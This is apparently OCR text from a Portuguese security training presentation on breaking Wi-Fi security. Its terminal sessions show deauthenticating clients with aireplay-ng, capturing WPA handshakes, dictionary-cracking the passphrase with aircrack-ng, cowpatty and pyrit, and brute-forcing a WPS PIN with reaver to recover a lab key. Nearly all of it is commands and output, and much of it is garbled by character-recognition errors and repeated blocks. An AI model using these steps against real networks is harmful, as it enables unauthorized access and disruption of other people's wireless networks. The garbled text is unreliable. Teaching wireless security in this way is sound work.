00:07:40:4D:1A:5C 00:26:5A:74:15:28 -25 54 - 5 8 26
aircrack-ng labvirus_wpa-01.cap
Opening labvirus_wpa-01.cap
Read 254839 packets.

# BSSID ESSID Encryption

1 00:07:40:4D:1A:5C LABVIRUS WPA (0 handshake)
aircrack-ng labvirus_wpa-01.cap
Opening labvirus_wpa-01.cap
Read 698 packets.

# BSSID ESSID Encryption

1 00:07:40:4D:1A:5C LABVIRUS WPA (1 handshake)

Choosing rst network as target.

Opening labvirus_wpa-01.cap
Please specify a dictionary (option -w).
tshark -r dlink-01.cap -R eapol

39965 377.079356 D-Link_50:2f:2e -> D-Link_74:15:28 EAPOL 131 Key (msg 1/4)
39968 377.086048 D-Link_74:15:28 -> D-Link_50:2f:2e EAPOL 160 Key (msg 2/4)
39969 377.089080 D-Link_50:2f:2e -> D-Link_74:15:28 EAPOL 187 Key (msg 3/4)
39971 377.104480 D-Link_74:15:28 -> D-Link_50:2f:2e EAPOL 136 Key (msg 4/4)
arireplay-ng --deauth 100 -c 00:26:5A:74:15:28 -e dlink mon0
08:49:22 Walung for beacon frame (LSSlu: dllnk) on channel 6
lound 8SSlu "00:18:11:30:2l:2L" Lo glven LSSlu "dllnk".
08:49:22 Sendlng 64 dlrecLed ueAuLh. S1MAC: [00:26:3A:74:13:28] [ 0|63
ACks]
arireplay-ng --deauth 100 -c 00:26:5A:74:15:28 -e dlink mon0
08:49:22 Walung for beacon frame (LSSlu: dllnk) on channel 6
lound 8SSlu "00:18:11:30:2l:2L" Lo glven LSSlu "dllnk".
08:49:22 Sendlng 64 dlrecLed ueAuLh. S1MAC: [00:26:3A:74:13:28] [ 0|63
ACks]
wpa_supplicant -Dwext -iwlan4 -c/etc/wpa_supplicant/wpa.conf
Trying to associate with 00:1b:11:50:2f:2e (SSID='dlink' freq=2437 MHz)
Associated with 00:1b:11:50:2f:2e
WPA: Key negotiation completed with 00:1b:11:50:2f:2e [PTK=CCMP GTK=CCMP]
CTRL-EVENT-CONNECTED - Connection to 00:1b:11:50:2f:2e completed (auth) [id=1 id_str=]
CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys
arireplay-ng --deauth 100 -c 00:26:5A:74:15:28 -e dlink mon0
08:49:22 Walung for beacon frame (LSSlu: dllnk) on channel 6
lound 8SSlu "00:18:11:30:2l:2L" Lo glven LSSlu "dllnk".
08:49:22 Sendlng 64 dlrecLed ueAuLh. S1MAC: [00:26:3A:74:13:28] [ 0|63
ACks]
wpa_supplicant -Dwext -iwlan4 -c/etc/wpa_supplicant/wpa.conf
Trying to associate with 00:1b:11:50:2f:2e (SSID='dlink' freq=2437 MHz)
Associated with 00:1b:11:50:2f:2e
WPA: Key negotiation completed with 00:1b:11:50:2f:2e [PTK=CCMP GTK=CCMP]
CTRL-EVENT-CONNECTED - Connection to 00:1b:11:50:2f:2e completed (auth) [id=1 id_str=]
CTRL-EVENT-DISCONNECTED - Disconnect event - remove keys
aircrack-ng dlink-01.cap
Opening dlink-01.cap
Read 60093 packets.

# BSSID ESSID Encryption

1 00:1B:11:50:2F:2E dlink WPA (1 handshake)

Aircrack-ng 1.1

[00:01:09] 88192 keys tested (1274.66 k/s)
KEY FOUND! [ pxxxxxxxxxxxxxxxx ]
Master Key : E3 C5 0B 41 F1 8B 96 00 4B E1 AF F8 D9 67 0F 1F
D4 63 BA F0 0B 8A 2C 55 5F DD 5F 58 21 03 CE E4
Transient Key : 00 C8 D3 4D C1 7A 8B D5 57 3C FB 5B 86 D5 56 09
57 FA 29 9E 1E 2D A3 27 C1 19 07 4F 76 0C 25 57
A8 E8 F0 69 14 DE F7 18 FE EB 41 55 A4 17 87 CC
01 F9 F9 A4 87 95 C7 1C 90 BD 12 B4 CC 63 9A C3
EAPOL HMAC : 17 4A DB 11 5A AE 52 D6 CF E6 E4 2A 96 1D FB D2
real 1m9.538s
user 4m18.786s
sys 0m0.629s
time aircrack-ng w popular_ptBR.dic dlink-01.cap
time genpmk -f 234k_pt-br_popular.dic -d dlink234.pmk -s dlink
[]

109216 passphrases tested in 542.98 seconds: 201.14 passphrases/second

real 9m2.988s
user 9m2.468s
sys 0m0.414s
time genpmk f popular.dic -d dlink234.pmk -s dlink
[]

109216 passphrases tested in 542.98 seconds: 201.14 passphrases/second

real 9m2.988s
user 9m2.468s
sys 0m0.414s
nme pyr|t -I popu|ar.d|c -o d||nk.pmk -e d||nk passthrough
yrlL 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg hup://pyrlL.googlecode.com
1hls code ls dlsLrlbuLed under Lhe Cnu Ceneral ubllc Llcense v3+

CompuLed 109216 Mks LoLal, 1863 Mks per secondd

rea| 1m20.7S3s
user 3m2.437s
sys 0m0.733s

Cowpatty
cowpauy 4.6 - WA-Sk dlcuonary auack. <[wrlghLhasborg.com>

CollecLed all necessary daLa Lo mounL crack agalnsL WA2/Sk passphrase.
SLarung dlcuonary auack. lease be pauenL.
key no. 10000: 22222222
key no. 20000: 93833104
key no. 30000: And48360
key no. 40000: Clb00043
key no. 30000: enqeLm17
key no. 60000: hamdan00
key no. 70000: llberLa10
key no. 80000: Mll08187

1he Sk ls pxxxxxxxxxxxxxxxxxx".

89038 passphrases LesLed ln 0.68 seconds: 130724.27 passphrases/second
cowpauy d dllnkpop.pmk -s dllnk -r dllnk-01.cap
Cowpatty
time pyrit -r dlink-01.cap I t-br_popular.dic attack_passthrough
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Parsing le 'dlink-01.cap' (1/1)...
Parsed 19 packets (19 802.11-packets), got 1 AP(s)

Picked AccessPoint 00:1b:11:50:2f:2e ('dlink') automatically.
Tried 109216 PMKs so far; 1870 PMKs per second.

The password is pxxxxxxxxxxxxx'.

real 1m21.027s
user 5m5.224s
sys 0m0.724s
Pyrit
Pyrit
pyrit benchmark
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Running benchmark (1239.9 PMKs/s)... \

Computed 1239.93 PMKs/s total.
#1: 'CPU-Core (SSE2)': 331.4 PMKs/s (RTT 3.0)
#2: 'CPU-Core (SSE2)': 332.1 PMKs/s (RTT 3.1)
#3: 'CPU-Core (SSE2)': 331.7 PMKs/s (RTT 3.0)
#4: 'CPU-Core (SSE2)': 331.3 PMKs/s (RTT 3.1)
pyrit benchmark
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Running benchmark (1239.9 PMKs/s)... \

Computed 1239.93 PMKs/s total.
#1: 'CPU-Core (SSE2)': 331.4 PMKs/s (RTT 3.0)
#2: 'CPU-Core (SSE2)': 332.1 PMKs/s (RTT 3.1)
#3: 'CPU-Core (SSE2)': 331.7 PMKs/s (RTT 3.0)
#4: 'CPU-Core (SSE2)': 331.3 PMKs/s (RTT 3.1)
Pyrit
pyrit benchmark
Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Running benchmark (1880.5 PMKs/s)... /

Computed 1880.52 PMKs/s total.
#1: 'CUDA-Device #1 'GeForce 320M'': 1588.4 PMKs/s (RTT 2.7)
#2: 'CPU-Core (SSE2)': 361.3 PMKs/s (RTT 2.9)
Ataque ao WPS

Ataque ao WPS
W|I| rotected Setup

8ecuperar congurao

8econgurar A

8eglsLrar
ln
ln
# wash -| mon0

Wash v1.4 Wlll roLecLed SeLup Scan 1ool
CopyrlghL (c) 2011, 1acucal neLwork Soluuons, Cralg Pener
<chenerLacneLsol.com>

8SSlu Channel 8SSl WS verslon WS Locked LSSlu
---------------------------------------------------------------------------------------------------
48:38:39:80:2u:2C 3 -34 1.0 no LA8vl8uS
# reaver -| mon0 -b 48:S8:39:80:D0:2C -v

8eaver v1.4 Wlll roLecLed SeLup Auack 1ool
CopyrlghL (c) 2011, 1acucal neLwork Soluuons, Cralg Pener
<chenerLacneLsol.com>

[+] Walung for beacon from 48:38:39:80:u0:2C
[+] AssoclaLed wlLh 48:38:39:80:u0:2C (LSSlu: LA8vl8uS)
[+] 1rylng pln 12343670
[+] WS ln: 12343670
[+] WA Sk: labvlrus2013
[+] A SSlu: LA8vl8uS
Dv|das?
ergunLas?
Crlucas?
SugesLes?
Siga a Clavis
http://clav.is/slideshare


http://clav.is/twitter


http://clav.is/facebook

Mu|to Cbr|gado!
mon|tor|aQc|av|s.com.br
academ|aQc|av|s.com.br
Nelson Murilo
Clavis Segurana da Informao